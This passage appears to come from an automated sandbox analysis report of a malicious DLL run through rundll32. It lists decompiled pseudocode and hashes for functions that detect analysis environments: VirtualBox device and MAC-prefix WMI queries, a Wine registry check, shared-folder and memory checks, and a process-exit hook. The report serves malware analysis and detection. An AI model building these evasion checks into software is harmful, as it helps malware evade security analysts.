                • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1998430482-342862491
                • Opcode ID: b16e8b392220c056975451eb42b1941d977d1626cf3c28a848fe2749b5378a2c
                • Instruction ID: a9a7fc11eaae9bba73a4730a78e91e581d9550aecb8a15baa51bf968dd8deee9
                • Opcode Fuzzy Hash: b16e8b392220c056975451eb42b1941d977d1626cf3c28a848fe2749b5378a2c
                • Instruction Fuzzy Hash: 93517A7A302F6086EB50DF21E84869C77A4F788F98F049116EE5E13B68CF78C884CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809DAE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 130memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1334 285c809dae0-285c809db0d call 285c80a0410 1337 285c809db13-285c809db53 SysAllocString * 2 1334->1337 1338 285c809dcb5-285c809dcbf 1334->1338 1339 285c809db55-285c809db58 1337->1339 1340 285c809dbaa-285c809dbb2 1337->1340 1343 285c809dba1-285c809dba4 SysFreeString 1339->1343 1344 285c809db5a-285c809db76 1339->1344 1341 285c809dbbd-285c809dbca 1340->1341 1342 285c809dbb4-285c809dbb7 SysFreeString 1340->1342 1345 285c809dbd0-285c809dbdf 1341->1345 1346 285c809dca5-285c809dcb4 1341->1346 1342->1341 1343->1340 1349 285c809db80-285c809db82 1344->1349 1347 285c809dc85-285c809dc9f CoUninitialize 1345->1347 1348 285c809dbe5 1345->1348 1347->1346 1350 285c809dbf0-285c809dc0d 1348->1350 1349->1343 1351 285c809db84-285c809db9b CoUninitialize 1349->1351 1356 285c809dc0f-285c809dc2b 1350->1356 1357 285c809dc81 1350->1357 1351->1343 1360 285c809dc31-285c809dc33 1356->1360 1357->1347 1361 285c809dc64-285c809dc70 1360->1361 1362 285c809dc35-285c809dc3d 1360->1362 1361->1357 1368 285c809dc72-285c809dc79 1361->1368 1362->1361 1363 285c809dc3f-285c809dc41 1362->1363 1364 285c809dc43-285c809dc56 call 285c80c9740 1363->1364 1365 285c809dc5a-285c809dc5e VariantClear 1363->1365 1364->1365 1365->1361 1368->1350 1370 285c809dc7f 1368->1370 1370->1347
                C-Code - Quality: 20%
                			E00000285285C809DAE0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t51;
				void* _t52;
				signed char _t58;
				void* _t66;
				void* _t90;
				intOrPtr* _t99;
				long long _t119;
				void* _t130;
				long long _t135;

				_t119 = __rsi;
				r15d = 0;
				_a24 = _t135;
				_v88 = _t135;
				_a16 = _t135;
				_t52 = E00000285285C80A0410(_t51,  &_a24,  &_v88, __rsi); // executed
				if (_t52 == 0) goto 0xc809dcb5;
				_v32 = _t119;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xc809dbaa;
				if (__rax == 0) goto 0xc809dba1;
				_v96 =  &_a16;
				_t13 = _t135 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809dba1;
				r14d = r15d;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xc809dbbd;
				__imp__#6();
				if (r14d == 0) goto 0xc809dca5;
				_t99 = _a16;
				_a32 = _t135;
				_a8 = r15d;
				if (_t99 == 0) goto 0xc809dc85;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t99 + 0x20))();
				if (_a8 == r15d) goto 0xc809dc81;
				_v96 = _t135;
				r8d = 0;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xc809dc64;
				_t58 = _v80 & 0x0000ffff;
				if (_t58 == r12w) goto 0xc809dc64;
				if ((_t58 & 0x00000008) == 0) goto 0xc809dc5a;
				E00000285285C80C9740(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
				_t66 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t66 != 0) goto 0xc809dc81;
				if (_a16 != 0) goto 0xc809dbf0;
				goto 0xc809dc85;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t66;
			}






















                0x285c809dae0
                0x285c809daec
                0x285c809daf7
                0x285c809dafb
                0x285c809db02
                0x285c809db06
                0x285c809db0d
                0x285c809db13
                0x285c809db1f
                0x285c809db24
                0x285c809db29
                0x285c809db2e
                0x285c809db3e
                0x285c809db44
                0x285c809db4d
                0x285c809db53
                0x285c809db58
                0x285c809db62
                0x285c809db67
                0x285c809db67
                0x285c809db6e
                0x285c809db82
                0x285c809db88
                0x285c809db8e
                0x285c809db98
                0x285c809db9b
                0x285c809dba4
                0x285c809dbb2
                0x285c809dbb7
                0x285c809dbca
                0x285c809dbd0
                0x285c809dbd4
                0x285c809dbd8
                0x285c809dbdf
                0x285c809dbe5
                0x285c809dbf7
                0x285c809dc03
                0x285c809dc06
                0x285c809dc0d
                0x285c809dc17
                0x285c809dc23
                0x285c809dc26
                0x285c809dc33
                0x285c809dc35
                0x285c809dc3d
                0x285c809dc41
                0x285c809dc4e
                0x285c809dc56
                0x285c809dc5e
                0x285c809dc6b
                0x285c809dc70
                0x285c809dc79
                0x285c809dc7f
                0x285c809dc88
                0x285c809dc92
                0x285c809dc9c
                0x285c809dc9f
                0x285c809dcb4

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                • API String ID: 1998430482-232164535
                • Opcode ID: 6ba35c0f7f04304ece7884aa3fcef00359219ea4fa24f49e35be5c11240c4b47
                • Instruction ID: eba4d879fa849869ed41b1ed22b9152b252a011d3c011d4e6c2ec134f1cad488
                • Opcode Fuzzy Hash: 6ba35c0f7f04304ece7884aa3fcef00359219ea4fa24f49e35be5c11240c4b47
                • Instruction Fuzzy Hash: 1851467A302F6186EB509F25E88869D77A4F784FDAF049116EE5E53B68CF38C485CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80C562C Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000285285C80C562C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0xc80c566d;
				if (_t5 == 0) goto 0xc80c5661;
				if (_t5 == 0) goto 0xc80c5654;
				if (__edx == 1) goto 0xc80c564d;
				return 1;
			}




                0x285c80c5630
                0x285c80c5632
                0x285c80c5637
                0x285c80c563c
                0x285c80c5641
                0x285c80c564c

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 4221786481-0
                • Opcode ID: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction ID: 2800b867953eb4a64711307b8b63c060f33a82c3a87d80729ad2872a83e64b45
                • Opcode Fuzzy Hash: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction Fuzzy Hash: 2B51A03D203F6185FA21AF65A44E39A2AD1FB55784F94C017A945772E7DE3CC885CF02
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809D740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction ID: e9e46de04e59de81cbc270d08d659328297f7c9dae1e6bc21194e1bf5876ffee
                • Opcode Fuzzy Hash: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction Fuzzy Hash: 8131B439216FD081F7618B68E44A3D5A3A1FFD5359F809103DA89935A1EF3DD256CF04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809F630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00000285285C809F630(void* __r9) {
				signed int _v24;
				char _v552;
				char _v1080;
				char _v1584;
				void* _v1608;
				signed char _t17;
				void* _t20;
				void* _t24;
				void* _t25;
				signed long long _t30;
				void* _t39;
				void* _t42;
				signed long long _t43;
				void* _t44;
				void* _t46;

				_t46 = __r9;
				_t30 =  *0xc814c720; // 0xee50a592130
				_v24 = _t30 ^ _t43;
				r8d = 0x208;
				E00000285285C80C8EF0(_t20, 0, _t24, _t25,  &_v552, _t39, _t42, _t44);
				asm("movups xmm0, [0x728ab]");
				asm("movsd xmm1, [0x728ac]");
				r8d = 0x1f0;
				asm("movaps [esp+0x20], xmm0");
				asm("movsd [esp+0x30], xmm1");
				E00000285285C80C8EF0(_t20, 0, _t24, _t25,  &_v1584, _t39, _t42, _t44);
				if (E00000285285C80A00A0() == 0) goto 0xc809f6b0;
				r8d = 0x104;
				ExpandEnvironmentStringsW(??, ??, ??);
				goto 0xc809f6bf;
				r9d = 0;
				_t5 = _t46 + 0x26; // 0x26
				r8d = _t5;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				_t17 = GetFileAttributesW(??); // executed
				if (_t17 == 0xffffffff) goto 0xc809f70e;
				if ((_t17 & 0x00000010) == 0) goto 0xc809f70e;
				return E00000285285C80C59D0(0, _v24 ^ _t43,  &_v1080, _t46);
			}


















                0x285c809f630
                0x285c809f637
                0x285c809f641
                0x285c809f653
                0x285c809f659
                0x285c809f65e
                0x285c809f66c
                0x285c809f674
                0x285c809f67a
                0x285c809f67f
                0x285c809f685
                0x285c809f699
                0x285c809f69b
                0x285c809f6a8
                0x285c809f6ae
                0x285c809f6b0
                0x285c809f6b5
                0x285c809f6b5
                0x285c809f6b9
                0x285c809f6d4
                0x285c809f6e2
                0x285c809f6eb
                0x285c809f6ef
                0x285c809f70d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction ID: 1de8189ff1277136db6fdcfe07e4edd5766fbc32d51d31582d8fa3d5bde5af81
                • Opcode Fuzzy Hash: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction Fuzzy Hash: 4F21CF3A326EA081FB709F24E84A3DA63A1FBC5345F808103D64D525A6EF3DC219CF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A0130 Relevance: 7.6, APIs: 5, Instructions: 56registryCOMMON
                Download Yara Rule
                C-Code - Quality: 17%
                			E00000285285C80A0130(void* __rdx, void* __r8, void* __r9) {
				signed int _v40;
				char _v2088;
				char _v2096;
				char _v2104;
				long long _v2112;
				long long _v2120;
				void* __rdi;
				long _t17;
				long _t18;
				void* _t24;
				void* _t26;
				void* _t27;
				signed long long _t32;
				long long _t36;
				void* _t50;
				signed long long _t52;

				_t54 = __r9;
				_t32 =  *0xc814c720; // 0xee50a592130
				_v40 = _t32 ^ _t52;
				_v2104 = 0;
				r8d = 0x800;
				_t50 = __r9;
				E00000285285C80C8EF0(_t24, 0, _t26, _t27,  &_v2088, __rdx, __r9, __r8);
				_v2096 = 0x104;
				r9d = 0x20019;
				_v2120 =  &_v2104;
				r8d = 0;
				_t17 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t17 != 0) goto 0xc80a01fc;
				_v2112 =  &_v2096;
				r9d = 0;
				_t36 =  &_v2088;
				r8d = 0;
				_v2120 = _t36;
				_t18 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
				if (_t18 != 0) goto 0xc80a01f1;
				__imp__StrStrIW();
				if (_t36 == 0) goto 0xc80a01f1;
				RegCloseKey(??);
				goto 0xc80a01fe;
				RegCloseKey(??); // executed
				return E00000285285C80C59D0(_t24, _v40 ^ _t52, _t50, _t54);
			}



















                0x285c80a0130
                0x285c80a013b
                0x285c80a0145
                0x285c80a0150
                0x285c80a0163
                0x285c80a0169
                0x285c80a016c
                0x285c80a0176
                0x285c80a017e
                0x285c80a0184
                0x285c80a0189
                0x285c80a0196
                0x285c80a019e
                0x285c80a01aa
                0x285c80a01af
                0x285c80a01b2
                0x285c80a01b7
                0x285c80a01bd
                0x285c80a01c2
                0x285c80a01ca
                0x285c80a01d4
                0x285c80a01dd
                0x285c80a01e4
                0x285c80a01ef
                0x285c80a01f6
                0x285c80a0218

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID:
                • API String ID: 1607946009-0
                • Opcode ID: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction ID: d7dde26c6aa53de0675f38ddae131e7ca2cc01feb93415802189ebc50e1652bd
                • Opcode Fuzzy Hash: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction Fuzzy Hash: CB21543A326F90C6FB609B15F858B9A63A0FB85B95F409126AE8D57B94DF3CC5448F00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809F230 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37registryCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000285285C809F230(void* __eflags, void* __rdx) {
				signed int _v24;
				char _v536;
				char _v552;
				long long _v568;
				long _t11;
				void* _t15;
				void* _t18;
				void* _t19;
				signed long long _t23;
				void* _t34;
				signed long long _t35;
				void* _t36;

				_t23 =  *0xc814c720; // 0xee50a592130
				_v24 = _t23 ^ _t35;
				r8d = 0x200;
				E00000285285C80C8EF0(_t15, 0, _t18, _t19,  &_v536, __rdx, _t34, _t36);
				E00000285285C809D1D0(_t15, _t23 ^ _t35,  &_v536, __rdx, L"Checking reg key %s ", L"SOFTWARE\\Wine");
				_v552 = 0;
				r9d = 0x20019;
				_v568 =  &_v552;
				r8d = 0;
				_t11 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t11 != 0) goto 0xc809f2d4;
				RegCloseKey(??);
				return E00000285285C80C59D0(_t15, _v24 ^ _t35, L"SOFTWARE\\Wine", L"SOFTWARE\\Wine");
			}















                0x285c809f237
                0x285c809f241
                0x285c809f250
                0x285c809f256
                0x285c809f273
                0x285c809f27d
                0x285c809f286
                0x285c809f28c
                0x285c809f291
                0x285c809f2a2
                0x285c809f2aa
                0x285c809f2b1
                0x285c809f2d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SOFTWARE\Wine
                • API String ID: 47109696-2978923392
                • Opcode ID: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction ID: fae8934d70af39fd1edd87e0f7962fca7b87558504bacfa9a562633b1080c22a
                • Opcode Fuzzy Hash: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction Fuzzy Hash: 12115B3A625FA082FB60DB60F45979A63A0FBC5795F808113AA5D53B95DF7CC105CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809A884 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$AllocQuery
                • String ID:
                • API String ID: 31662377-0
                • Opcode ID: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction ID: 906478d64428e10e4f9aadc829c09b9a3369b348c83cb82ea82db963a5e5549e
                • Opcode Fuzzy Hash: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction Fuzzy Hash: 0531A229317B6481FA219B11A40971563D0F349BE0F19C536EE6D27B98DE3CC6418F80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809A748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00000285285C809A748(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
				void* _t16;
				intOrPtr _t24;
				void* _t25;
				long long _t42;
				intOrPtr* _t43;
				signed long long _t44;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t61;
				char* _t63;

				_t60 = __r9;
				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rdi;
				_a32 = __r9;
				GetModuleHandleA(??);
				if (__rax == 0) goto 0xc809a811;
				_a32 = __rax;
				E00000285285C809B35C(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
				if (_t42 == 0) goto 0xc809a811;
				 *0xc81530ac = 1;
				if ( *0xc81530ac == 1) goto 0xc809a796;
				_t52 =  *0xc8153320; // 0x285c6070000
				if (_t52 == 0) goto 0xc809a7fb;
				_t24 =  *0xc815332c; // 0xa
				if (_t24 == 0) goto 0xc809a7cf;
				_t43 = _t52;
				if ( *_t43 == 0) goto 0xc809a805;
				_t44 = _t43 + 0x3c;
				if (1 - _t24 < 0) goto 0xc809a7c1;
				if (1 == 0xffffffff) goto 0xc809a7fb;
				_t63 = _t44 * 0x3c + _t52;
				_t53 = _a32;
				 *((long long*)(_t63 + 1)) = _t42;
				_t16 = E00000285285C809A568(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
				if (_t16 != 0) goto 0xc809a7fb;
				 *_t63 = 0;
				 *0xc81530ac = 0;
				goto 0xc809a814;
				 *((char*)(_t44 * 0x3c + _t53)) = 1;
				goto 0xc809a7d2;
				return 0xffffffff;
			}













                0x285c809a748
                0x285c809a748
                0x285c809a748
                0x285c809a74d
                0x285c809a752
                0x285c809a764
                0x285c809a76f
                0x285c809a77c
                0x285c809a786
                0x285c809a791
                0x285c809a79b
                0x285c809a7a4
                0x285c809a7a6
                0x285c809a7b0
                0x285c809a7b2
                0x285c809a7bc
                0x285c809a7be
                0x285c809a7c3
                0x285c809a7c7
                0x285c809a7cd
                0x285c809a7d5
                0x285c809a7dd
                0x285c809a7e0
                0x285c809a7e8
                0x285c809a7ec
                0x285c809a7f3
                0x285c809a7f5
                0x285c809a7fb
                0x285c809a803
                0x285c809a80b
                0x285c809a80f
                0x285c809a824

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModulelstrcmp
                • String ID: RtlExitUserProcess$ntdll.dll
                • API String ID: 4066981444-1735925572
                • Opcode ID: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction ID: 9876ad2014cafd99bcf1f57bf1b0e230bf0646055f6c819770a9238cb1d61a74
                • Opcode Fuzzy Hash: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction Fuzzy Hash: F821A139317FA085EA55DB19AC5A21566A2EB853A0F15C23BD9B9177E0EE3CC4428F40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809D990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33shareCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000285285C809D990() {
				signed int _v24;
				char _v552;
				intOrPtr _v568;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				signed long long _t24;
				void* _t30;
				void* _t33;
				signed long long _t34;
				void* _t35;
				void* _t37;

				_t24 =  *0xc814c720; // 0xee50a592130
				_v24 = _t24 ^ _t34;
				r8d = 0x208;
				E00000285285C80C8EF0(_t14, 0, _t19, _t20,  &_v552, _t30, _t33, _t35);
				_v568 = 0x104;
				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
				if (_t11 != 0) goto 0xc809da0f;
				__imp__StrCmpIW();
				return E00000285285C80C59D0(0 | _t11 == 0x00000000, _v24 ^ _t34, L"VirtualBox Shared Folders", _t37);
			}
















                0x285c809d997
                0x285c809d9a1
                0x285c809d9b0
                0x285c809d9b6
                0x285c809d9c0
                0x285c809d9d2
                0x285c809d9da
                0x285c809d9e8
                0x285c809da0e

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameProvider
                • String ID: VirtualBox Shared Folders
                • API String ID: 262172401-2247368375
                • Opcode ID: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction ID: 8d0835ef1b84dc4560a4bce04b3ad10699eff3e81e1eef4f8979d5c0fae06a6e
                • Opcode Fuzzy Hash: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction Fuzzy Hash: 4401627A326FD082FB60DB24E89939A63A0F7C9755FC09017964E96695EF7CC105CF04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80DC3C8 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000285285C80DC3C8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
				void* _t6;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				void* _t27;
				void* _t33;
				void* _t36;

				_t33 = __rdx;
				_t31 = __rcx;
				_t29 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				GetLastError();
				_t13 =  *0xc814c964; // 0xffffffff
				if (_t13 == 0xffffffff) goto 0xc80dc3f9;
				_t6 = E00000285285C80DC9F4(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0xc80dc43a;
				E00000285285C80D7C38(_t6, _t31, _t33); // executed
				_t36 = _t27;
				if (_t27 != 0) goto 0xc80dc419;
				E00000285285C80DA780(_t27, _t31);
				goto 0xc80dc43f;
				_t16 =  *0xc814c964; // 0xffffffff
				if (E00000285285C80DCA4C(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0xc80dc412;
				E00000285285C80DC0A0(_t36, _t27);
				_t11 = E00000285285C80DA780(_t27, _t36);
				if (_t36 != 0) goto 0xc80dc449;
				SetLastError(??);
				goto 0xc80dc454;
				SetLastError(??);
				return _t11;
			}










                0x285c80dc3c8
                0x285c80dc3c8
                0x285c80dc3c8
                0x285c80dc3c8
                0x285c80dc3c8
                0x285c80dc3cd
                0x285c80dc3d7
                0x285c80dc3dd
                0x285c80dc3ea
                0x285c80dc3ec
                0x285c80dc3f7
                0x285c80dc403
                0x285c80dc408
                0x285c80dc40e
                0x285c80dc412
                0x285c80dc417
                0x285c80dc419
                0x285c80dc42c
                0x285c80dc42e
                0x285c80dc435
                0x285c80dc43d
                0x285c80dc441
                0x285c80dc447
                0x285c80dc44b
                0x285c80dc466

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction ID: fe18876808ab6b36e7342467e35a6d7f6efe734a088d1d57f138645156de99f0
                • Opcode Fuzzy Hash: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction Fuzzy Hash: 1411A12D303FB082FA18A7A5A51D3382191DF88BD0F45C52B990A777C6DE3CC8468B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809F9F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00000285285C809F9F0() {
				signed int _v24;
				intOrPtr _v28;
				void* _v80;
				intOrPtr _v88;
				void* _t20;
				signed long long _t23;
				signed long long _t24;
				void* _t29;
				signed long long _t30;
				void* _t31;
				signed long long _t32;

				_t32 = _t30;
				_t23 =  *0xc814c720; // 0xee50a592130
				_t24 = _t23 ^ _t30;
				_v24 = _t24;
				 *(_t32 - 0x54) = _t24;
				 *(_t32 - 0x4c) = _t24;
				 *(_t32 - 0x44) = _t24;
				 *(_t32 - 0x3c) = _t24;
				 *(_t32 - 0x34) = _t24;
				 *(_t32 - 0x2c) = _t24;
				 *(_t32 - 0x24) = _t24;
				_v28 = 0;
				_v88 = 0x40;
				GlobalMemoryStatusEx(??); // executed
				return E00000285285C80C59D0(_t20, _v24 ^ _t30, _t29, _t31);
			}














                0x285c809f9f0
                0x285c809f9f7
                0x285c809f9fe
                0x285c809fa01
                0x285c809fa0c
                0x285c809fa10
                0x285c809fa14
                0x285c809fa18
                0x285c809fa1c
                0x285c809fa20
                0x285c809fa24
                0x285c809fa28
                0x285c809fa2c
                0x285c809fa34
                0x285c809fa5f

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID: @
                • API String ID: 1890195054-2766056989
                • Opcode ID: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction ID: 252403a2e067f0b032c139ca4521955a8e5328c6b96b82c6ffb02601958f9aa4
                • Opcode Fuzzy Hash: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction Fuzzy Hash: 4FF0F43A72AF5089EB90CF22E81934D33E5F38C790F92813AD69D82700EF3985218F04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809A568 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                Download Yara Rule
                C-Code - Quality: 29%
                			E00000285285C809A568(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
				long long _v40;
				void* __rsi;
				void* __rbp;
				signed char _t56;
				int _t61;
				void* _t65;
				void* _t66;
				void* _t73;
				void* _t75;
				void* _t78;
				void* _t81;
				signed char _t88;
				signed long long _t92;
				long long _t94;
				void* _t97;
				signed long long _t107;
				intOrPtr* _t108;
				signed long long _t109;
				intOrPtr* _t111;
				void* _t117;
				long long _t118;
				void* _t119;
				long long _t120;
				char* _t126;
				intOrPtr* _t128;

				_a8 = __rbx;
				_a32 = __r9;
				_a24 = __r8;
